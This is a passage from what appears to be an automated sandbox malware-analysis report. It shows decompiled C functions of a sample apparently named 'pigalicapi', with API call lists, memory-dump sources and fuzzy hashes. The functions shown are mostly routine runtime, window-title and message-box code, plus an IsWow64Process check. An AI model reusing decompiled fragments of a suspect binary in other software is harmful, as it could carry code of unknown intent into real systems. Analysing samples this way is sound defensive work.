                                                                                                                                                                                                                                                                                          • API ID: lstrcatlstrcpy$Messagelstrlen$CreateFileLoadSendStringTextWindow
                                                                                                                                                                                                                                                                                          • String ID: Error reading file!
                                                                                                                                                                                                                                                                                          • API String ID: 3921680268-1254819211
                                                                                                                                                                                                                                                                                          • Opcode ID: e944470cf28009c51f2dbdccb4b94a161f69d8af6ea9e8106e9f1ee66ee65541
                                                                                                                                                                                                                                                                                          • Instruction ID: 58d57107b2166bce395f2192f2bc1d6594680cc5e287fe9fce952ae4bca696dc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e944470cf28009c51f2dbdccb4b94a161f69d8af6ea9e8106e9f1ee66ee65541
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8016737300704BBD3209B99EC85F87B79CFB88710F10811AF655D7290C670E4558B90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 27%
                                                                                                                                                                                                                                                                                          			E0081E9AE(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t27 = __esi;
                                                                                                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                                                                                                          				_t23 = __ecx;
                                                                                                                                                                                                                                                                                          				_t22 = __ebx;
                                                                                                                                                                                                                                                                                          				_t30 = _a20;
                                                                                                                                                                                                                                                                                          				if(_a20 != 0) {
                                                                                                                                                                                                                                                                                          					_push(_a20);
                                                                                                                                                                                                                                                                                          					_push(__ebx);
                                                                                                                                                                                                                                                                                          					_push(__esi);
                                                                                                                                                                                                                                                                                          					_push(_a4);
                                                                                                                                                                                                                                                                                          					E0081E91C(__ebx, __edi, __esi, _t30);
                                                                                                                                                                                                                                                                                          					_t28 = _t28 + 0x10;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t31 = _a28;
                                                                                                                                                                                                                                                                                          				_push(_a4);
                                                                                                                                                                                                                                                                                          				if(_a28 != 0) {
                                                                                                                                                                                                                                                                                          					_push(_a28);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_push(_t27);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E0081DF11(_t23);
                                                                                                                                                                                                                                                                                          				_push( *_t26);
                                                                                                                                                                                                                                                                                          				_push(_a16);
                                                                                                                                                                                                                                                                                          				_push(_a12);
                                                                                                                                                                                                                                                                                          				_push(_t27);
                                                                                                                                                                                                                                                                                          				E0081E39E(_t22, _t25, _t26, _t27, _t31);
                                                                                                                                                                                                                                                                                          				_push(0x100);
                                                                                                                                                                                                                                                                                          				_push(_a24);
                                                                                                                                                                                                                                                                                          				_push(_a16);
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                                                                                                                                                                                                                                                                                          				_push(_a8);
                                                                                                                                                                                                                                                                                          				_t14 = _t22 + 0xc; // 0x6e
                                                                                                                                                                                                                                                                                          				_push(_t27);
                                                                                                                                                                                                                                                                                          				_push(_a4);
                                                                                                                                                                                                                                                                                          				_t20 = E0081E601(_t22,  *_t14, _t26, _t27, _t31);
                                                                                                                                                                                                                                                                                          				if(_t20 != 0) {
                                                                                                                                                                                                                                                                                          					E0081DED8(_t20, _t27);
                                                                                                                                                                                                                                                                                          					return _t20;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t20;
                                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                                          0x0081e9ae
                                                                                                                                                                                                                                                                                          0x0081e9ae
                                                                                                                                                                                                                                                                                          0x0081e9ae
                                                                                                                                                                                                                                                                                          0x0081e9ae
                                                                                                                                                                                                                                                                                          0x0081e9b3
                                                                                                                                                                                                                                                                                          0x0081e9b7
                                                                                                                                                                                                                                                                                          0x0081e9b9
                                                                                                                                                                                                                                                                                          0x0081e9bc
                                                                                                                                                                                                                                                                                          0x0081e9bd
                                                                                                                                                                                                                                                                                          0x0081e9be
                                                                                                                                                                                                                                                                                          0x0081e9c1
                                                                                                                                                                                                                                                                                          0x0081e9c6
                                                                                                                                                                                                                                                                                          0x0081e9c6
                                                                                                                                                                                                                                                                                          0x0081e9c9
                                                                                                                                                                                                                                                                                          0x0081e9cd
                                                                                                                                                                                                                                                                                          0x0081e9d0
                                                                                                                                                                                                                                                                                          0x0081e9d5
                                                                                                                                                                                                                                                                                          0x0081e9d2
                                                                                                                                                                                                                                                                                          0x0081e9d2
                                                                                                                                                                                                                                                                                          0x0081e9d2
                                                                                                                                                                                                                                                                                          0x0081e9d8
                                                                                                                                                                                                                                                                                          0x0081e9dd
                                                                                                                                                                                                                                                                                          0x0081e9df
                                                                                                                                                                                                                                                                                          0x0081e9e2
                                                                                                                                                                                                                                                                                          0x0081e9e5
                                                                                                                                                                                                                                                                                          0x0081e9e6
                                                                                                                                                                                                                                                                                          0x0081e9ee
                                                                                                                                                                                                                                                                                          0x0081e9f3
                                                                                                                                                                                                                                                                                          0x0081e9f7
                                                                                                                                                                                                                                                                                          0x0081e9fa
                                                                                                                                                                                                                                                                                          0x0081e9fd
                                                                                                                                                                                                                                                                                          0x0081ea00
                                                                                                                                                                                                                                                                                          0x0081ea03
                                                                                                                                                                                                                                                                                          0x0081ea04
                                                                                                                                                                                                                                                                                          0x0081ea07
                                                                                                                                                                                                                                                                                          0x0081ea11
                                                                                                                                                                                                                                                                                          0x0081ea15
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081ea15
                                                                                                                                                                                                                                                                                          0x0081ea1b

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • ___BuildCatchObject.LIBCMT ref: 0081E9C1
                                                                                                                                                                                                                                                                                            • Part of subcall function 0081E91C: ___BuildCatchObjectHelper.LIBCMT ref: 0081E952
                                                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 0081E9D8
                                                                                                                                                                                                                                                                                          • ___FrameUnwindToState.LIBCMT ref: 0081E9E6
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                                                                          • API String ID: 2163707966-3733052814
                                                                                                                                                                                                                                                                                          • Opcode ID: a3b6e0bba8c6188151cdd87e1afa2bcb579a1f25e0b14c436fbadd08ef490303
                                                                                                                                                                                                                                                                                          • Instruction ID: 7a40d8348e23d99ebde1c7802b7f74d2dc73f77e0d5694097916ffb9e6e79311
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3b6e0bba8c6188151cdd87e1afa2bcb579a1f25e0b14c436fbadd08ef490303
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B301F271000219BBDF22AF55CC45EEA7FAEFF18350F044010BD58A5122DB3699B1EBA2
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E00808220(void* __eax, void* __eflags) {
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t20 = __eax;
                                                                                                                                                                                                                                                                                          				_t7 = E008072C0(_t15, __eax + 0x250);
                                                                                                                                                                                                                                                                                          				if(_t7 != 0) {
                                                                                                                                                                                                                                                                                          					SetWindowTextA( *(_t20 + 0x254), 0);
                                                                                                                                                                                                                                                                                          					lstrcpyA(_t20 + 0x2a8, 0x82293e);
                                                                                                                                                                                                                                                                                          					lstrcpyA(_t20 + 0x3ac, "Untitled");
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t20 + 0x254), 0xb9, 0, 0);
                                                                                                                                                                                                                                                                                          					return E00808160(_t20);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x00808223
                                                                                                                                                                                                                                                                                          0x0080822b
                                                                                                                                                                                                                                                                                          0x00808232
                                                                                                                                                                                                                                                                                          0x0080823d
                                                                                                                                                                                                                                                                                          0x00808255
                                                                                                                                                                                                                                                                                          0x00808263
                                                                                                                                                                                                                                                                                          0x00808275
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080827b
                                                                                                                                                                                                                                                                                          0x00808283

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 008072C0: SendMessageA.USER32 ref: 008072E4
                                                                                                                                                                                                                                                                                            • Part of subcall function 008072C0: GetParent.USER32(?), ref: 008072F2
                                                                                                                                                                                                                                                                                            • Part of subcall function 008072C0: wsprintfA.USER32 ref: 0080730D
                                                                                                                                                                                                                                                                                            • Part of subcall function 008072C0: MessageBoxA.USER32 ref: 00807325
                                                                                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 0080823D
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,0082293E,?,?,?,00807AB8), ref: 00808255
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,Untitled,?,?,?,00807AB8), ref: 00808263
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00808275
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrlenA.KERNEL32(?,?,?), ref: 00808182
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: LoadStringA.USER32 ref: 008081A2
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrlenA.KERNEL32(?,?,?), ref: 008081AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcpyA.KERNEL32(?,?,?,?), ref: 008081C4
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcatA.KERNEL32(?,00822A2C), ref: 008081DF
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcatA.KERNEL32(?, - ), ref: 008081E7
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcatA.KERNEL32(?,?,?, - ), ref: 008081F1
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: SetWindowTextA.USER32(?), ref: 008081F8
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Messagelstrcatlstrcpy$SendTextWindowlstrlen$LoadParentStringwsprintf
                                                                                                                                                                                                                                                                                          • String ID: Untitled
                                                                                                                                                                                                                                                                                          • API String ID: 3036718229-1345941684
                                                                                                                                                                                                                                                                                          • Opcode ID: 2754440e29f508a3261562598e60288f136f59675830730ed70db7a9c6f11bc6
                                                                                                                                                                                                                                                                                          • Instruction ID: 72885648162eaa48f54f0e6221f21c0a4ed65b4d2ce86085abcb23ec83ae5346
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2754440e29f508a3261562598e60288f136f59675830730ed70db7a9c6f11bc6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36F08C72300A01BBD628A7B4DC89F96F368FF84701F004114B355D61D0CF74A8A48BA8
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                          			E04009290() {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          					_v12(GetCurrentProcess(),  &_v8);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                                          0x04009296
                                                                                                                                                                                                                                                                                          0x040092b4
                                                                                                                                                                                                                                                                                          0x040092bb
                                                                                                                                                                                                                                                                                          0x040092c8
                                                                                                                                                                                                                                                                                          0x040092c8
                                                                                                                                                                                                                                                                                          0x040092d1

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 040092A7
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 040092AE
                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 040092C1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                                                          • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                                                          • Opcode ID: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
                                                                                                                                                                                                                                                                                          • Instruction ID: 4f9345edf5834c8cb0bc8acfac962fe0122c83c58fee2cee7c9637e45e33d241
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5E09275D04308EBEB04DFF4D94DB9D7B78EB08205F504694E545B2140D6786A54CB51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                                                                                                                          			E00813810(intOrPtr* __ecx, char _a4) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				CHAR* _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                                                                                          				long _t35;
                                                                                                                                                                                                                                                                                          				CHAR** _t39;
                                                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                                                          				CHAR** _t51;
                                                                                                                                                                                                                                                                                          				CHAR* _t66;
                                                                                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t75;
                                                                                                                                                                                                                                                                                          				CHAR* _t77;
                                                                                                                                                                                                                                                                                          				LONG* _t78;
                                                                                                                                                                                                                                                                                          				signed int _t79;
                                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0081F3E0);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t81 = _t80 - 8;
                                                                                                                                                                                                                                                                                          				_t28 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_push(_t28 ^ _t79);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t75 = __ecx;
                                                                                                                                                                                                                                                                                          				if(__ecx == 0) {
                                                                                                                                                                                                                                                                                          					_t72 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t2 = _t75 - 0x24; // 0x0
                                                                                                                                                                                                                                                                                          					_t72 = _t2;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E00813C60( &_v24, 2);
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t57 = _v24;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v24 - 8)) <= 0) {
                                                                                                                                                                                                                                                                                          					MessageBeep(0x10);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t66 =  *0x86ad30; // 0x86ad2c
                                                                                                                                                                                                                                                                                          					_v20 = _t66;
                                                                                                                                                                                                                                                                                          					_v8 = 1;
                                                                                                                                                                                                                                                                                          					E008058F0( &_v20, _t57, _a4);
                                                                                                                                                                                                                                                                                          					_t81 = _t81 + 8;
                                                                                                                                                                                                                                                                                          					_push(3);
                                                                                                                                                                                                                                                                                          					if( *_t75 == 0) {
                                                                                                                                                                                                                                                                                          						_push( &_a4);
                                                                                                                                                                                                                                                                                          						_t39 = E00813C60();
                                                                                                                                                                                                                                                                                          						_t77 = _v20;
                                                                                                                                                                                                                                                                                          						MessageBoxA( *(_t72 + 4), _t77,  *_t39, 0x40);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_push( &_a4);
                                                                                                                                                                                                                                                                                          						_t51 = E00813C60();
                                                                                                                                                                                                                                                                                          						_t77 = _v20;
                                                                                                                                                                                                                                                                                          						MessageBoxA( *( *_t75 + 4), _t77,  *_t51, 0x40);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t43 = _a4;
                                                                                                                                                                                                                                                                                          					_t18 = _t43 - 0xc; // -11
                                                                                                                                                                                                                                                                                          					if(_t18 != 0x86ad20 && InterlockedDecrement(_t43 + 0xfffffff4) <= 0) {
                                                                                                                                                                                                                                                                                          						_push(_a4 + 0xfffffff4);
                                                                                                                                                                                                                                                                                          						E008162C2();
                                                                                                                                                                                                                                                                                          						_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					if(_t77 - 0xc != 0x86ad20) {
                                                                                                                                                                                                                                                                                          						_t78 =  &(_t77[0xfffffffffffffff4]);
                                                                                                                                                                                                                                                                                          						if(InterlockedDecrement(_t78) <= 0) {
                                                                                                                                                                                                                                                                                          							_push(_t78);
                                                                                                                                                                                                                                                                                          							E008162C2();
                                                                                                                                                                                                                                                                                          							_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                          				_t35 = _v24;
                                                                                                                                                                                                                                                                                          				if(_t35 - 0xc != 0x86ad20) {
                                                                                                                                                                                                                                                                                          					_t35 = InterlockedDecrement(_t35 + 0xfffffff4);
                                                                                                                                                                                                                                                                                          					if(_t35 <= 0) {
                                                                                                                                                                                                                                                                                          						_push(_v24 + 0xfffffff4);
                                                                                                                                                                                                                                                                                          						_t35 = E008162C2();
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				return _t35;
                                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                                          0x00813813
                                                                                                                                                                                                                                                                                          0x00813815
                                                                                                                                                                                                                                                                                          0x00813820
                                                                                                                                                                                                                                                                                          0x00813821
                                                                                                                                                                                                                                                                                          0x00813827
                                                                                                                                                                                                                                                                                          0x0081382e
                                                                                                                                                                                                                                                                                          0x00813832
                                                                                                                                                                                                                                                                                          0x00813838
                                                                                                                                                                                                                                                                                          0x0081383c
                                                                                                                                                                                                                                                                                          0x00813843
                                                                                                                                                                                                                                                                                          0x0081383e
                                                                                                                                                                                                                                                                                          0x0081383e
                                                                                                                                                                                                                                                                                          0x0081383e
                                                                                                                                                                                                                                                                                          0x0081383e
                                                                                                                                                                                                                                                                                          0x0081384b
                                                                                                                                                                                                                                                                                          0x00813850
                                                                                                                                                                                                                                                                                          0x00813857
                                                                                                                                                                                                                                                                                          0x00813865
                                                                                                                                                                                                                                                                                          0x00813912
                                                                                                                                                                                                                                                                                          0x0081386b
                                                                                                                                                                                                                                                                                          0x0081386b
                                                                                                                                                                                                                                                                                          0x00813871
                                                                                                                                                                                                                                                                                          0x00813874
                                                                                                                                                                                                                                                                                          0x00813880
                                                                                                                                                                                                                                                                                          0x00813885
                                                                                                                                                                                                                                                                                          0x0081388b
                                                                                                                                                                                                                                                                                          0x0081388d
                                                                                                                                                                                                                                                                                          0x008138ac
                                                                                                                                                                                                                                                                                          0x008138ad
                                                                                                                                                                                                                                                                                          0x008138b4
                                                                                                                                                                                                                                                                                          0x008138bf
                                                                                                                                                                                                                                                                                          0x0081388f
                                                                                                                                                                                                                                                                                          0x00813892
                                                                                                                                                                                                                                                                                          0x00813893
                                                                                                                                                                                                                                                                                          0x0081389c
                                                                                                                                                                                                                                                                                          0x008138bf
                                                                                                                                                                                                                                                                                          0x008138bf
                                                                                                                                                                                                                                                                                          0x008138c5
                                                                                                                                                                                                                                                                                          0x008138c8
                                                                                                                                                                                                                                                                                          0x008138d1
                                                                                                                                                                                                                                                                                          0x008138e3
                                                                                                                                                                                                                                                                                          0x008138e4
                                                                                                                                                                                                                                                                                          0x008138e9
                                                                                                                                                                                                                                                                                          0x008138e9
                                                                                                                                                                                                                                                                                          0x008138ef
                                                                                                                                                                                                                                                                                          0x008138f9
                                                                                                                                                                                                                                                                                          0x008138fb
                                                                                                                                                                                                                                                                                          0x00813903
                                                                                                                                                                                                                                                                                          0x00813905
                                                                                                                                                                                                                                                                                          0x00813906
                                                                                                                                                                                                                                                                                          0x0081390b
                                                                                                                                                                                                                                                                                          0x0081390b
                                                                                                                                                                                                                                                                                          0x00813903
                                                                                                                                                                                                                                                                                          0x008138f9
                                                                                                                                                                                                                                                                                          0x00813918
                                                                                                                                                                                                                                                                                          0x0081391f
                                                                                                                                                                                                                                                                                          0x0081392b
                                                                                                                                                                                                                                                                                          0x00813931
                                                                                                                                                                                                                                                                                          0x00813935
                                                                                                                                                                                                                                                                                          0x0081393d
                                                                                                                                                                                                                                                                                          0x0081393e
                                                                                                                                                                                                                                                                                          0x00813943
                                                                                                                                                                                                                                                                                          0x00813935
                                                                                                                                                                                                                                                                                          0x00813949
                                                                                                                                                                                                                                                                                          0x00813957

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 008138BF
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(-000000F3), ref: 008138D7
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 008138FF
                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(00000010), ref: 00813912
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00813931
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: DecrementInterlocked$Message$Beep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3609174286-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8be8541f4727cfb90b5f9db477dc8aa1c14e16af9475202356281236d405c8ae
                                                                                                                                                                                                                                                                                          • Instruction ID: 60d41f8dbf849be7b38fe50480c3a6a72125975edb29029da4a970a109dc5134
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8be8541f4727cfb90b5f9db477dc8aa1c14e16af9475202356281236d405c8ae
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E41B3B2904609ABD714CB68CC85F9AB76CFF05320F108624F925E7391E774AE44CBA1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                                                                          			E04007250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
